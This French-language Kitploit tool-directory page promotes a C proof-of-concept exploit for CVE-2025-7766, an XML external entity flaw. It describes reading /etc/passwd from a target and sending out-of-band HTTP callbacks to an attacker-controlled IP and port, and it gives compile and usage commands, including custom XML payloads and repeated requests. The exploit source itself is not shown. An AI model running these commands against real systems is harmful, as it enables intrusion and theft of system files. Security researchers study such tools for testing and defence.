Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-7766 — Exploit PoC basé sur C pour CVE-2025-7766 démontrant XXE-to-RCE via lecture de fichier et rappels HTTP hors bande. Prend en charge les charges utiles XML personnalisées et les requêtes répétées. | Kitploit
Outils/GitHubGitHub/bytereaper77/cve-2025-7766
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges UtilesArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

Exploit PoC basé sur C pour CVE-2025-7766 démontrant XXE-to-RCE via lecture de fichier et rappels HTTP hors bande. Prend en charge les charges utiles XML personnalisées et les requêtes répétées.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-7766 PoC Exploit

PoC pour l'exploitation d'une vulnérabilité d'entité externe XML dans CVE-2025-7766. Démontre la lecture de fichier (/etc/passwd) et les rappels HTTP hors bande.

Auteur : Byte Reaper

CVE : CVE-2025-7766

Vulnérabilité : Exécution de code à distance via une entité externe XML (XXE)


PoC pour l'exploitation de XXE dans CVE-2025-7766. Démontre :

  • Lecture de /etc/passwd depuis la cible.
  • Déclenchement d'une requête HTTP hors bande vers votre serveur.

Prérequis

  • gcc
  • libcurl
  • bibliothèque argparse

Compilation

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

Utilisation

root@kitploit:~
# Charge utile de lecture de fichier
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT

# Charge utile de requête hors bande
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -r

# Charge utile personnalisée
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -b '<VOTRE_XML_PERSONNALISÉ>'

# Répéter les requêtes 5 fois
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -r -l 5

# Sortie verbeuse
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -v

LICENCE :

MIT

Télécharger l’outil